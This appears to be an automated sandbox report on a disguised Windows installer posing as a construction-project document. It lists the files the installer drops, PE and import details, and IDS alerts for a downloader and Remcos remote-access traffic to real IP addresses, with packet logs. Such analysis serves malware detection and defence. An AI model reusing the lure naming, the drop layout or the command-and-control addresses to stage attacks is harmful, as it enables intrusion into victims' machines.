                                                                                                                        Process:C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe
                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):2
                                                                                                                        Entropy (8bit):1.0
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:Qn:Qn
                                                                                                                        MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                        SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                        SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                        SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                        Malicious:false
                                                                                                                        Preview:..

                                                                                                                        C:\Users\user\AppData\Roaming\incontemptible\koput\Citerbare.for

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):366017
                                                                                                                        Entropy (8bit):1.2532028651885465
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:dbvIzLHxoD5eNiie4lwAqTxNpy1eR0AByGhsjNV+k8jonGozrxNC/+BuLoi2DA9J:dI+LxNQtzwGxHzi+tbTYv4QFZfMG
                                                                                                                        MD5:8DEF494BFC232DD8D9DA302DD0F500AD
                                                                                                                        SHA1:1AD2FAA4B812AC0C6D01A262590DFC8066A9AE30
                                                                                                                        SHA-256:2A45F95B9F82E3F400E065F16025346A5278BB03D55E3F3D3BB04837A32EF69E
                                                                                                                        SHA-512:106D4C3277F0C5B374D725F042EEFBF241ACFE55899BD42EFF7D7CE56A4908FA3B5CFD75B7FFD3187D76357C85CDC7E82DC93FD9D076C8EF62704D316C2EB244
                                                                                                                        Malicious:false
                                                                                                                        Preview:...........2............................................m..........................Q..............{...._....................=...._..6.....c......................~................................"................5..................................../...................................................P....D....................................................O........................................o...................../....................................................................Z..."..........i.........................................................................4.rE......L.................7........................................................................t....................................q.....................................................p.............q....................................................................>..$.................(.......].............................................................+...................d.................................

                                                                                                                        C:\Users\user\AppData\Roaming\incontemptible\koput\Losser\alman.txt

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe
                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):408
                                                                                                                        Entropy (8bit):4.299736369748956
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:12:d10AgX3AR5XDgWIMF+3I/rb7HPkvQXkFt1gSuaAy:T0tX3iVkWIMF+3I/LP+QG1rr9
                                                                                                                        MD5:04EA5F289C84B44129BCFA191ECED45B
                                                                                                                        SHA1:E2505ED098F8B9815005EE58BDDACF40179C9D86
                                                                                                                        SHA-256:9AA6257187EB745A66D35AE1536ECDB075E22CD48D941C5AE1AFE3287CF3FCEE
                                                                                                                        SHA-512:798B8B1A5B0707CEBAD64414ABD7E238C3C4CBEF02696A6CDC98E3427406D74B47FF41B6DF1796F204FE58947156CDE8A332FC2B11884E724B54FC02C248450A
                                                                                                                        Malicious:false
                                                                                                                        Preview:blockhole hermafrodittens brawlingly seropus milieuomraadets annebeths..prolixity maskinstuers kattemaden fejltrinenes horoscoper everhart.tuskes superaspiration instinkterne gluneamie.applikationsprogrammrens forhekselserne hes bisamrottes gretel balaenoid datebook uniflowered..afrohaarets cholralosed forflg,didaktiker pseudophallic frskolealder squattiness ulotrichaceous consumation opgavesttets repos..

                                                                                                                        C:\Users\user\AppData\Roaming\incontemptible\koput\Losser\doorcheek.mar

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):231219
                                                                                                                        Entropy (8bit):1.2469505743129965
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:kG1XbScC6kNorGiP8+Fq6BiOiqrcS3M6X7QQz82rc//gKj0OVdY0vLTRX34nSaIc:kPNj+/Vy6XTKjTZn5Wb/8
                                                                                                                        MD5:B8DCFF52B32142B46BCF9E07C97FE39B
                                                                                                                        SHA1:1DC3097327E42B862D9DAAA41F6B4DB8417D44B4
                                                                                                                        SHA-256:1C74E5F1420689E862000BE741AE2B1E0E85861269454B028C231CCB7AB20260
                                                                                                                        SHA-512:B6EB26FE2DA081E8CDFA0C0B9E7CF63F40EA561A6A743BD67D0B1564CEB354C7D7B26D28AB3060E381D0B8CD08B9E9E9F7FD03C63FE4750F02796E8B45F304FC
                                                                                                                        Malicious:false
                                                                                                                        Preview:...................*..................................&.....j...........2....................................]......*1....P......................I................T..................................7................................................................".......................................................\.....................f....5...............F..................{........h..................+..........Z.............................@.................A.@..............Q................................................................................................................................................................i...5.....G...................................................>1.................x...a...............7...........................................................&......................e....................................................<.k...........................................V..................................................................h...

                                                                                                                        C:\Users\user\AppData\Roaming\incontemptible\koput\Losser\inkompetencers.aca

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):439309
                                                                                                                        Entropy (8bit):1.2535989842374102
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:BDBApFss1TiZa+ZJGxLn2CGfgUdqiY4H258QjjjIAfXMsSFa3C59X66JAqtkEBRU:cB7A32jjaikB4eNkPO+jvCMUB9
                                                                                                                        MD5:A52FC0A739A55A6C379086CF33B63E8A
                                                                                                                        SHA1:00F9D7338B1858C9625C2524CB30E9C01BCD70E1
                                                                                                                        SHA-256:3D94DFA61B0EA65EB5D101A193BE132433B5C875342CBAF3107EB4F671C7155B
                                                                                                                        SHA-512:2C816D9B05C5C9EADC5EC32A256619257D876296385D25DD3A2B7923D397045FD937BC9BEE9AB20C31F3E78E46FDEB45D8256635F9BA6E1D2619E2C03BFF12D3
                                                                                                                        Malicious:false
                                                                                                                        Preview:.....X................9.............Q........`..f.......7..................................... .........................|....O.................................B...t...................................................,..h.....................................................................,.....................................r.................................................................+.................................................v.........Q.............!........................................|...........................>.............................................#.................................................................................h.................E................6....k..................}.......................................[..........................:............................=..............................}..........f............................................................../......=...E............................................A...................

                                                                                                                        C:\Users\user\AppData\Roaming\incontemptible\koput\Pseudodipterally.muc

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):99603
                                                                                                                        Entropy (8bit):4.620497911390432
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:iQD89oZ+GxnYHCVVznKg2vxZ2eVQ7gIJHe:54wnYo9nK1vxZZV5IJ+
                                                                                                                        MD5:BC9AFDEACA064DC5DA84ACF2D04E3577
                                                                                                                        SHA1:72B7BE79142A29CEDA1AFAC6CEE25EB3ACF0A9D6
                                                                                                                        SHA-256:5C673857E74A09846011C7A8EB895C4FA59725B6DD34A3E056721437166AF38D
                                                                                                                        SHA-512:E3004DE5EFD0D130CDD5C9010940B27EFD86B11D8F222317FDEA61BD4829DEBC36D57D13519E3C5D4241F143E9D24AF5C74FE7409DE0CD9D4723F4228DCE7CDE
                                                                                                                        Malicious:false
                                                                                                                        Preview:...............Z.......................................e..........I.........xxxx.AAAA.............y.....?.....5.....y.S....5..................................................^.///..oooooo..LLL.........::.....1..O..Q...TT..............++....T.=.ZZZZ..............111...E.........W..........].........._..----.....kk............ZZ.......^^^.6.VV.................\\.UU........ ...............NNNN.......................................U........5.z..................MMMMM....;.................}}}.f...ooo.............::............................."..VVVVV...........................*...ssss..........lll.......x..r...............cc...............ff...Z.....................::...............B..................ZZ...A......................*..........^..................kkk..............@...........777................BB....lll....vvv.C..^.B.......|||......AA....R.........).......m...V...........YY.....................................!.OO..55555555555.YYY......#............tt......................QQQ.##

                                                                                                                        C:\Users\user\AppData\Roaming\incontemptible\koput\kabalers.Reg

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):462985
                                                                                                                        Entropy (8bit):7.101092680320197
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6144:fbAGyIcif/hxF1hPHxx8NAS7Ymf8Jtl1rv6bXFiSbaMHzjtVxh:fbARIcif/hP1hvP8SS7YxtlpibBzBVD
                                                                                                                        MD5:B5C6C69CE7BDE93BA974FAF5D299AC46
                                                                                                                        SHA1:4D9E4FB8FA8FEDD34E324D4F0EA9D3C743A08022
                                                                                                                        SHA-256:FC80479873AF715F0B89884550B439BB801C9A4051CD07BB910F6B87ADC84BC6
                                                                                                                        SHA-512:361F6E8141BEF067D6D944ADB84B5889696E5229C03E074BE6F71642A6BE28E2C34B7A84D8EC4CA4965E7162B334934559D7AF84A0FB1CB07DACF378A227C36A
                                                                                                                        Malicious:false
                                                                                                                        Preview:.....................J.....n.SS.............................c.................m.e......~..........Y...............~~~...................XX........22.....]..h.............y.?.........hhhhhh...........................YY...........AA......dd..F.S........................>........***........'''.....................j.D."""......=.0...:........................................ ....YYY...I..HHHH.....................>........R....&&.......................z........................}}."......xxx.........C....".....r.`.....c.....ZZ.==.............................44.......ZZ.........||..=..........&&..yy................\.......7777.......f....88...........!.............hh.................0.......u....i....X.99.........h...........M..&.ee......}}.........00..jj....M............:..............................III.........I....PPPPPPPP...p..................%%%%%.m..B..........................jjj....".......pp..................E..............................L................II..k..................:::::..

                                                                                                                        Static File Info

                                                                                                                        General

                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                        Entropy (8bit):7.731554844311202
                                                                                                                        TrID:
                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                        File name:Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe
                                                                                                                        File size:808'698 bytes
                                                                                                                        MD5:92e917f439cc408828a0629d80fdb043
                                                                                                                        SHA1:ffcf08807371521fb40a31aff774e3275cd4338d
                                                                                                                        SHA256:6959fb446ee0634e6622e50f0f1b9367bffddf12f8083507cdc0ff39ed50abf4
                                                                                                                        SHA512:c78fa619b27defc8a458a841b7fa20fe84e738e2d13203d0c8f454adb83555da99c574105bc36d4aeb765ee0cb67d158a1828fb2f88a92d1f6dcc51c7dfd5f9a
                                                                                                                        SSDEEP:12288:GtomEHbPcEFdCSdWdQqOFvvcW/5W4MiTFroRnk9YZaax8NNAta67Qi5vz8s+u+K+:TN7PcKd66MWjBroRbkOQ/t
                                                                                                                        TLSH:2D05F113FB63C0E7DB7EA3F2F683E5BB1DFDA4567C90848D56A2A6D26000E32051E525
                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.*ju.*ju.*j..ujw.*ju.+j..*j..wjd.*j!..j..*j..,jt.*jRichu.*j........PE..L....\.U.................`...*......Z3.......p....@

                                                                                                                        File Icon

                                                                                                                        Icon Hash:c9b9b9ad9b83e979

                                                                                                                        Static PE Info

                                                                                                                        General

                                                                                                                        Entrypoint:0x40335a
                                                                                                                        Entrypoint Section:.text
                                                                                                                        Digitally signed:false
                                                                                                                        Imagebase:0x400000
                                                                                                                        Subsystem:windows gui
                                                                                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                        Time Stamp:0x55C15CE6 [Wed Aug 5 00:46:30 2015 UTC]
                                                                                                                        TLS Callbacks:
                                                                                                                        CLR (.Net) Version:
                                                                                                                        OS Version Major:4
                                                                                                                        OS Version Minor:0
                                                                                                                        File Version Major:4
                                                                                                                        File Version Minor:0
                                                                                                                        Subsystem Version Major:4
                                                                                                                        Subsystem Version Minor:0
                                                                                                                        Import Hash:e221f4f7d36469d53810a4b5f9fc8966

                                                                                                                        Entrypoint Preview

                                                                                                                        Instruction
                                                                                                                        sub esp, 000002D8h
                                                                                                                        push ebx
                                                                                                                        push ebp
                                                                                                                        push esi
                                                                                                                        push edi
                                                                                                                        push 00000020h
                                                                                                                        xor ebp, ebp
                                                                                                                        pop esi
                                                                                                                        mov dword ptr [esp+18h], ebp
                                                                                                                        mov dword ptr [esp+10h], 00409230h
                                                                                                                        mov dword ptr [esp+14h], ebp
                                                                                                                        call dword ptr [00407034h]
                                                                                                                        push 00008001h
                                                                                                                        call dword ptr [004070BCh]
                                                                                                                        push ebp
                                                                                                                        call dword ptr [004072ACh]
                                                                                                                        push 00000009h
                                                                                                                        mov dword ptr [004292B8h], eax
                                                                                                                        call 00007FF1CD4D189Eh
                                                                                                                        mov dword ptr [00429204h], eax
                                                                                                                        push ebp
                                                                                                                        lea eax, dword ptr [esp+38h]
                                                                                                                        push 000002B4h
                                                                                                                        push eax
                                                                                                                        push ebp
                                                                                                                        push 004206A8h
                                                                                                                        call dword ptr [0040717Ch]
                                                                                                                        push 0040937Ch
                                                                                                                        push 00428200h
                                                                                                                        call 00007FF1CD4D1509h
                                                                                                                        call dword ptr [00407134h]
                                                                                                                        mov ebx, 00434000h
                                                                                                                        push eax
                                                                                                                        push ebx
                                                                                                                        call 00007FF1CD4D14F7h
                                                                                                                        push ebp
                                                                                                                        call dword ptr [0040710Ch]
                                                                                                                        push 00000022h
                                                                                                                        mov dword ptr [00429200h], eax
                                                                                                                        pop edi
                                                                                                                        mov eax, ebx
                                                                                                                        cmp word ptr [00434000h], di
                                                                                                                        jne 00007FF1CD4CE949h
                                                                                                                        mov esi, edi
                                                                                                                        mov eax, 00434002h
                                                                                                                        push esi
                                                                                                                        push eax
                                                                                                                        call 00007FF1CD4D0F47h
                                                                                                                        push eax
                                                                                                                        call dword ptr [00407240h]
                                                                                                                        mov ecx, eax
                                                                                                                        mov dword ptr [esp+1Ch], ecx
                                                                                                                        jmp 00007FF1CD4CEA3Bh
                                                                                                                        push 00000020h
                                                                                                                        pop edx
                                                                                                                        cmp ax, dx
                                                                                                                        jne 00007FF1CD4CE949h
                                                                                                                        inc ecx
                                                                                                                        inc ecx
                                                                                                                        cmp word ptr [ecx], dx

                                                                                                                        Rich Headers

                                                                                                                        Programming Language:
                                                                                                                        • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                                        Data Directories

                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x74940xb4.rdata
                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x4a0000x329e8.rsrc
                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x70000x2b8.rdata
                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                        Sections

                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                        .text0x10000x5f0a0x60005e32878b5f332958538d1180572efaacFalse0.6613362630208334data6.449510420642677IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                        .rdata0x70000x13540x14002222fe44ebbadbc32af32dfc9c88e48eFalse0.4306640625data5.037511188789184IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                        .data0x90000x202f80x600bdee9c3c56769fb763ba9ed65b414b2cFalse0.484375data3.832327307800933IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                        .ndata0x2a0000x200000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                        .rsrc0x4a0000x329e80x32a002a1a63438510fc393e60de344f7865bbFalse0.40760030864197533data6.330044290302057IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                        Resources

                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                        RT_ICON0x4a3880x10a00Device independent bitmap graphic, 128 x 256 x 32, image size 65536EnglishUnited States0.23011630639097744
                                                                                                                        RT_ICON0x5ad880x9a00PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9756239853896104
                                                                                                                        RT_ICON0x647880x9600Device independent bitmap graphic, 96 x 192 x 32, image size 36864EnglishUnited States0.26375
                                                                                                                        RT_ICON0x6dd880x5600Device independent bitmap graphic, 72 x 144 x 32, image size 20736EnglishUnited States0.2945130813953488
                                                                                                                        RT_ICON0x733880x4400Device independent bitmap graphic, 64 x 128 x 32, image size 16384EnglishUnited States0.31301700367647056
                                                                                                                        RT_ICON0x777880x2600Device independent bitmap graphic, 48 x 96 x 32, image size 9216EnglishUnited States0.3628700657894737
                                                                                                                        RT_ICON0x79d880x1200Device independent bitmap graphic, 32 x 64 x 32, image size 4096EnglishUnited States0.4375
                                                                                                                        RT_ICON0x7af880xa00Device independent bitmap graphic, 24 x 48 x 32, image size 2304EnglishUnited States0.529296875
                                                                                                                        RT_ICON0x7b9880x600Device independent bitmap graphic, 16 x 32 x 32, image size 1024EnglishUnited States0.47265625
                                                                                                                        RT_DIALOG0x7bf880x144dataEnglishUnited States0.5216049382716049
                                                                                                                        RT_DIALOG0x7c0d00x100dataEnglishUnited States0.5234375
                                                                                                                        RT_DIALOG0x7c1d00x11cdataEnglishUnited States0.6056338028169014
                                                                                                                        RT_DIALOG0x7c2f00x60dataEnglishUnited States0.7291666666666666
                                                                                                                        RT_GROUP_ICON0x7c3500x84dataEnglishUnited States0.7045454545454546
                                                                                                                        RT_VERSION0x7c3d80x2d0dataEnglishUnited States0.49027777777777776
                                                                                                                        RT_MANIFEST0x7c6a80x33fXML 1.0 document, ASCII text, with very long lines (831), with no line terminatorsEnglishUnited States0.5547533092659447

                                                                                                                        Imports

                                                                                                                        DLLImport
                                                                                                                        KERNEL32.dllCompareFileTime, SearchPathW, SetFileTime, CloseHandle, GetShortPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, GetFullPathNameW, CreateDirectoryW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, SetFileAttributesW, ExpandEnvironmentStringsW, SetErrorMode, LoadLibraryW, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, lstrcpyA, lstrcpyW, lstrcatW, GetSystemDirectoryW, GetVersion, GetProcAddress, LoadLibraryA, GetModuleHandleA, GetModuleHandleW, lstrcmpiW, lstrcmpW, WaitForSingleObject, GlobalFree, GlobalAlloc, LoadLibraryExW, GetExitCodeProcess, FreeLibrary, WritePrivateProfileStringW, GetCommandLineW, GetTempPathW, GetPrivateProfileStringW, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, WriteFile, lstrlenA, WideCharToMultiByte
                                                                                                                        USER32.dllEndDialog, ScreenToClient, GetWindowRect, RegisterClassW, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, wsprintfW, CreateWindowExW, SystemParametersInfoW, AppendMenuW, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, GetDC, SetWindowLongW, LoadImageW, SendMessageTimeoutW, FindWindowExW, EmptyClipboard, OpenClipboard, TrackPopupMenu, EndPaint, ShowWindow, GetDlgItem, IsWindow, SetForegroundWindow
                                                                                                                        GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                                                        SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
                                                                                                                        ADVAPI32.dllRegCloseKey, RegOpenKeyExW, RegDeleteKeyW, RegDeleteValueW, RegEnumValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                                                                        COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                                                        ole32.dllCoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
                                                                                                                        VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

                                                                                                                        Possible Origin

                                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                                        EnglishUnited States

                                                                                                                        Network Behavior

                                                                                                                        Suricata IDS Alerts

                                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                        2024-12-16T16:18:45.335302+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.44973666.63.187.3080TCP
                                                                                                                        2024-12-16T16:18:50.616214+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449737162.251.122.872404TCP
                                                                                                                        2024-12-16T16:18:52.803573+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449738162.251.122.872404TCP
                                                                                                                        2024-12-16T16:18:53.084850+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.449739178.237.33.5080TCP

                                                                                                                        Network Port Distribution

                                                                                                                        TCP Packets

                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                        Dec 16, 2024 16:18:43.869462967 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:43.989345074 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:43.989439011 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:43.989994049 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:44.109649897 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.335046053 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.335092068 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.335110903 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.335175991 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.335197926 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.335241079 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.335259914 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.335302114 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.335423946 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.335581064 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.335599899 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.335619926 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.335684061 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.335721016 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.455117941 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.455138922 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.455174923 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.455205917 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.526942968 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.527056932 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.527167082 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.531302929 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.531377077 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.531472921 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.531567097 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.537765026 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.537847996 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.537858963 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.537982941 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.545989037 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.546180964 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.546194077 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.546258926 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.554490089 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.554574966 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.554641008 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.554641008 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.562863111 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.563025951 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.563035011 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.563113928 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.571279049 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.571382046 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.571427107 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.571533918 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.579660892 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.579745054 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.579758883 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.579894066 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.588095903 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.588201046 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.588407993 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.596456051 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.596561909 CET804973666.63.187.30192.168.2.4
